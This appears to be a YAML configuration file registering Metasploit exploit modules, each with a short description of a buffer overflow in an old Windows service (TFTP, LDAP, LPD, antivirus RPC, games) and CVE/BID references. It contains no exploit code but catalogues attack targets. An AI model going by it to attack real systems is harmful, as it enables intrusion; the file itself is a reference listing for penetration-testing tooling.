msf_key: windows/mmsp/ms10_025_wmss_connect_funnel
name: Windows Media Services ConnectFunnel Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Windows Media\n\
\t\t\t\tUnicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n\
\t\t\t\tcrafted FunnelConnect request, an attacker can execute arbitrary code\n\
\t\t\t\tunder the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n\
\t\t\t\twith Windows 2000 Server, but is not installed by default.\n\n\
\t\t\t\tNOTE: This service does NOT restart automatically. Successful, as well as\n\
\t\t\t\tunsuccessful exploitation attempts will kill the service which prevents\n\
\t\t\t\tadditional attempts.\n\
\t\t\t"
authors:
- - CVE
- 2010-0478
- - OSVDB
- "63726"
- - MSB
- MS10-025
- - URL
- https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt
path: extensions/metasploit/
class: Msf_module
msf_attftp_long_filename:
enable: true
msf: true
msf_key: windows/tftp/attftp_long_filename
name: Allied Telesyn TFTP Server 1.9 Long Filename Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n\
\t\t\t\trequest (get/write) for an overly long file name.\n\
\t\t\t"
authors:
- - CVE
- 2006-6184
- - OSVDB
- "11350"
- - BID
- "21320"
- - URL
- http://milw0rm.com/exploits/2887
- - URL
- ftp://guest:guest@ftp.alliedtelesyn.co.uk/pub/utilities/at-tftpd19.zip
path: extensions/metasploit/
class: Msf_module
msf_quick_tftp_pro_mode:
enable: true
msf: true
msf_key: windows/tftp/quick_tftp_pro_mode
name: Quick FTP Pro 2.1 Transfer-Mode Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Quick TFTP Pro server\n\
\t\t\t\tproduct. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n\
\t\t\t\tin a DoS. This is a port of a sploit by Mati \"muts\" Aharoni.\n\
\t\t\t"
authors:
- - CVE
- 2008-1610
- - OSVDB
- "43784"
- - BID
- "28459"
- - URL
- http://secunia.com/advisories/29494
path: extensions/metasploit/
class: Msf_module
msf_threectftpsvc_long_mode:
enable: true
msf: true
msf_key: windows/tftp/threectftpsvc_long_mode
name: 3CTftpSvc TFTP Long Mode Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By\n\
\t\t\t\tsending a specially crafted packet with an overly long mode\n\
\t\t\t\tfield, a remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code on the system.\n\
\t\t\t"
authors:
- - CVE
- 2006-6183
- - OSVDB
- "30758"
- - BID
- "21301"
- - URL
- http://secunia.com/advisories/23113/
path: extensions/metasploit/
class: Msf_module
msf_dlink_long_filename:
enable: true
msf: true
msf_key: windows/tftp/dlink_long_filename
name: D-Link TFTP 1.0 Long Filename Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in D-Link TFTP 1.0.\n\
\t\t\t\tBy sending a request for an overly long file name, an attacker\n\
\t\t\t\tcould overflow a buffer and execute arbitrary code. For best results,\n\
\t\t\t\tuse bind payloads with nonx (No NX).\n\
\t\t\t"
authors:
- - CVE
- 2007-1435
- - OSVDB
- "33977"
- - BID
- "22923"
path: extensions/metasploit/
class: Msf_module
msf_tftpdwin_long_filename:
enable: true
msf: true
msf_key: windows/tftp/tftpdwin_long_filename
name: TFTPDWIN v0.4.2 Long Filename Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending\n\
\t\t\t\tan overly long file name to the tftpd.exe server, the stack can be overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2006-4948
- - OSVDB
- "29032"
- - BID
- "20131"
- - URL
- http://www.milw0rm.com/exploits/3132
path: extensions/metasploit/
class: Msf_module
msf_futuresoft_transfermode:
enable: true
msf: true
msf_key: windows/tftp/futuresoft_transfermode
name: FutureSoft TFTP Server 2000 Transfer-Mode Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the FutureSoft TFTP Server\n\
\t\t\t\t2000 product. By sending an overly long transfer-mode string, we were able\n\
\t\t\t\tto overwrite both the SEH and the saved EIP. A subsequent write-exception\n\
\t\t\t\tthat will occur allows the transferring of execution to our shellcode\n\
\t\t\t\tvia the overwritten SEH. This module has been tested against Windows\n\
\t\t\t\t2000 Professional and for some reason does not seem to work against\n\
\t\t\t\tWindows 2000 Server (could not trigger the overflow at all).\n\
\t\t\t"
authors:
- - CVE
- 2005-1812
- - OSVDB
- "16954"
- - BID
- "13821"
- - URL
- http://www.security.org.sg/vuln/tftp2000-1001.html
path: extensions/metasploit/
class: Msf_module
msf_tftpd32_long_filename:
enable: true
msf: true
msf_key: windows/tftp/tftpd32_long_filename
name: TFTPD32 <= 2.21 Long Filename Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in TFTPD32 version 2.21\n\
\t\t\t\tand prior. By sending a request for an overly long file name\n\
\t\t\t\tto the tftpd32 server, a remote attacker could overflow a buffer and\n\
\t\t\t\texecute arbitrary code on the system.\n\
\t\t\t"
authors:
- - CVE
- 2002-2226
- - OSVDB
- "45903"
- - BID
- "6199"
path: extensions/metasploit/
class: Msf_module
msf_imail_thc:
enable: true
msf: true
msf_key: windows/ldap/imail_thc
name: IMail LDAP Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a buffer overflow in the LDAP service that is\n\
\t\t\t\tpart of the IMail product. This module was tested against\n\
\t\t\t\tversion 7.10 and 8.5, both running on Windows 2000.\n\
\t\t\t"
authors:
- - CVE
- 2004-0297
- - OSVDB
- "3984"
- - BID
- "9682"
- - URL
- http://secunia.com/advisories/10880/
path: extensions/metasploit/
class: Msf_module
msf_pgp_keyserver7:
enable: true
msf: true
msf_key: windows/ldap/pgp_keyserver7
name: Network Associates PGP KeyServer 7 LDAP Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the LDAP service that is\n\
\t\t\t\t\tpart of the NAI PGP Enterprise product suite. This module was tested\n\
\t\t\t\t\tagainst PGP KeyServer v7.0. Due to space restrictions, egghunter is\n\
\t\t\t\t\tused to find our payload - therefore you may wish to adjust WfsDelay.\n\
\t\t\t"
authors:
- - CVE
- 2001-1320
- - OSVDB
- "4742"
- - BID
- "3046"
- - URL
- http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/
path: extensions/metasploit/
class: Msf_module
msf_hummingbird_exceed:
enable: true
msf: true
msf_key: windows/lpd/hummingbird_exceed
name: Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Hummingbird Connectivity\n\
\t\t\t\t10 LPD Daemon. This module has only been tested against Hummingbird\n\
\t\t\t\tExceed v10 with SP5.\n\
\t\t\t"
authors:
- - CVE
- 2005-1815
- - OSVDB
- "16957"
- - BID
- "13788"
path: extensions/metasploit/
class: Msf_module
msf_saplpd:
enable: true
msf: true
msf_key: windows/lpd/saplpd
name: SAP SAPLPD 6.28 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40).\n\
\t\t\t\tBy sending an overly long argument, an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2008-0621
- - OSVDB
- "41127"
- - BID
- "27613"
path: extensions/metasploit/
class: Msf_module
msf_wincomlpd_admin:
enable: true
msf: true
msf_key: windows/lpd/wincomlpd_admin
name: WinComLPD <= 3.0.2 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in WinComLPD <= 3.0.2.\n\
\t\t\t\tBy sending an overly long authentication packet to the remote\n\
\t\t\t\tadministration service, an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2008-5159
- - OSVDB
- "42861"
- - BID
- "27614"
path: extensions/metasploit/
class: Msf_module
msf_niprint:
enable: true
msf: true
msf_key: windows/lpd/niprint
name: NIPrint LPD Request Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the\n\
\t\t\t\tNetwork Instrument NIPrint LPD service. Inspired by\n\
\t\t\t\tImmunity's VisualSploit :-)\n\
\t\t\t"
authors:
- - CVE
- 2003-1141
- - OSVDB
- "2774"
- - BID
- "8968"
- - URL
- http://www.immunitysec.com/documentation/vs_niprint.html
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_serverprotect:
enable: true
msf: true
msf_key: windows/antivirus/trendmicro_serverprotect
name: Trend Micro ServerProtect 5.58 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n\
\t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1070
- - OSVDB
- "33042"
- - BID
- "22639"
path: extensions/metasploit/
class: Msf_module
msf_symantec_rtvscan:
enable: true
msf: true
msf_key: windows/antivirus/symantec_rtvscan
name: Symantec Remote Management Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Symantec Client Security 3.0.x.\n\
\t\t\t\tThis module has only been tested against Symantec Client Security 3.0.2\n\
\t\t\t\tbuild 10.0.2.2000.\n\
\t\t\t"
authors:
- - CVE
- 2006-2630
- - OSVDB
- "25846"
- - BID
- "18107"
- - URL
- http://research.eeye.com/html/advisories/published/AD20060612.html
path: extensions/metasploit/
class: Msf_module
msf_symantec_iao:
enable: true
msf: true
msf_key: windows/antivirus/symantec_iao
name: Symantec Alert Management System Intel Alert Originator Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe.\n\
\t\t\t\tWhen an attacker sends a specially crafted alert, arbitrary code may be executed.\n\
\t\t\t"
authors:
- - CVE
- 2009-1430
- - OSVDB
- "54159"
- - BID
- "34674"
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_serverprotect_createbinding:
enable: true
msf: true
msf_key: windows/antivirus/trendmicro_serverprotect_createbinding
name: Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n\
\t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2508
- - OSVDB
- "35790"
- - BID
- "23868"
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_serverprotect_earthagent:
enable: true
msf: true
msf_key: windows/antivirus/trendmicro_serverprotect_earthagent
name: Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060\n\
\t\t\t\tEarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2508
- - OSVDB
- "35789"
- - BID
- "23866"
path: extensions/metasploit/
class: Msf_module
msf_racer_503beta5:
enable: true
msf: true
msf_key: windows/games/racer_503beta5
name: Racer v0.5.3 beta 5 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Racer Car and Racing Simulator game,\n\
\t\t\t\tversions v0.5.3 beta 5 and earlier. Both the client and server listen\n\
\t\t\t\ton UDP port 26000. By sending an overly long buffer we are able to\n\
\t\t\t\texecute arbitrary code remotely.\n\
\t\t\t"
authors:
- - CVE
- 2007-4370
- - OSVDB
- "39601"
- - URL
- http://www.milw0rm.com/exploits/4283
- - BID
- "25297"
path: extensions/metasploit/
class: Msf_module
msf_mohaa_getinfo:
enable: true
msf: true
msf_key: windows/games/mohaa_getinfo
name: Medal Of Honor Allied Assault getinfo Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in the getinfo\n\
\t\t\t\tcommand of Medal Of Honor Allied Assault.\n\
\t\t\t"
authors:
- - CVE
- 2004-0735
- - OSVDB
- "8061"
- - URL
- http://www.milw0rm.com/exploits/357
- - BID
- "10743"
path: extensions/metasploit/
class: Msf_module